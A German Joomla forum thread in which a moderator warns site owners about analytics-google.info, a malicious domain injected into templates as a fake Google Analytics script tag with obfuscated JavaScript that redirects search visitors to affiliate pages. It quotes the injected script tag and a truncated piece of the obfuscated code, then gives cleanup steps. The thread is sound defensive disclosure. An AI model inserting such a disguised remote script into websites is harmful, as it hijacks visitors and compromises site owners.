+ Antworten
Ergebnis 1 bis 5 von 5

Thema: Sicherheitswarnung - analytics-google.info

  1. #1
    Moderator Avatar von holmi
    Registriert seit
    30.08.2004
    Ort
    Harz
    Beiträge
    6.502
    Bedankte sich
    92
    Erhielt 1.234 Danksagungen
    in 1.133 Beiträgen

    Standard Sicherheitswarnung - analytics-google.info

    analytics-google.info ist nicht von Google!

    Die Seite wird hier bereits als Malware gelistet:
    http://www.malwaredomainlist.com/mdl...cs-google.info


    Es wird Code in die index.php vom Template eingeschleust der auf den ersten Blick wie der Tracking Code von Google Analytics aussieht
    <script src="http://analytics-google.info/urchin.js"></script>

    Original: <script src="http://www.google-analytics.com/urchin.js">

    Neben diesem urchin.js wird weiterer verschlüsselter Code eingebunden:
    http://www.joomlaportal.de/sicherhei...tml#post666372

    Oben im Template:
    <!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857 .... usw.

    Ganz am ende im Template:
    <script>check_content()</script><!-- 1213806179 --><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a) ... usw.


    Wenn der Code in der Seite enthalten ist, werden Besucher die die Seite bei Google in den Suchergebnissen anklicken
    auf eine analytics-google.info Suchseite weitergeleitet.
    Die Suchbegriffe mit der die original Seite bei Google gefunden wurde werden übernommen.

    Von den neuen Suchergebnissen wird man dann über Affiliate Seiten auf weitere Seiten geleitet.


    Infos durch welche Lücke der Code eingeschleust wird gibt es bist jetzt nicht.
    Und es ist auch noch unbekannt ob noch mehr auf der Seite verändert wird.

    Darum bleibt bis dahin nur die übliche Vorgehensweise:
    http://www.joomlaportal.de/sicherhei...tml#post666781
    Zitat Zitat von flotte Beitrag anzeigen
    1) Sofort den gesamten Auftritt mit allen Dateien entfernen (sichern!)
    2) Datenbankinhalt entfernen
    3) Letzte definitv saubere Sicherung einspielen
    4) Alle Passwörter ändern (Datenbank, Joomla, FTP, etc.)
    5) Log-Dateien holen und Einbruchslücke lokalisieren
    6) Lücke schließen!
    Björn
    Problem gelöst? Dann markiere den Thread mit [GELÖST]

  2. #2
    Moderator Avatar von holmi
    Registriert seit
    30.08.2004
    Ort
    Harz
    Beiträge
    6.502
    Bedankte sich
    92
    Erhielt 1.234 Danksagungen
    in 1.133 Beiträgen
    Problem gelöst? Dann markiere den Thread mit [GELÖST]

  3. #3
    Verbringt hier viel Zeit Avatar von serk
    Registriert seit
    27.12.2006
    Ort
    Cologne
    Beiträge
    830
    Bedankte sich
    74
    Erhielt 189 Danksagungen
    in 164 Beiträgen

    Standard

    Und damit es auch wirklich jeder mitbekommt, Yiggt das mal...

    http://www.yigg.de/2065694

    //Edit: @holmi, Mi-Schi ist der aus dem anderen Forum...

    Wenn´s geholfen hat, Feedback geben, eventuell "Danke" drücken!

    Virtuemart SEO | Virtuemart Templates & Themes | Joomlanews


  4. #4
    Moderator Avatar von holmi
    Registriert seit
    30.08.2004
    Ort
    Harz
    Beiträge
    6.502
    Bedankte sich
    92
    Erhielt 1.234 Danksagungen
    in 1.133 Beiträgen

    Standard

    Die Domain analytics-google.info gibt es nicht mehr.


    Wer den oben beschriebenen Code in seinem Template entdeckt sollte ihn aber löschen.
    Und natürlich nach der Lücke suchen durch die der Code eingeschleust wurde!


    Björn
    Problem gelöst? Dann markiere den Thread mit [GELÖST]

  5. #5
    Neu an Board
    Registriert seit
    22.04.2009
    Beiträge
    2
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    sehr geniale Taktik. Ist es wirklich funktioniert?
    Signatur wegen Regelverstoß gelöscht - jamfx

+ Antworten

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein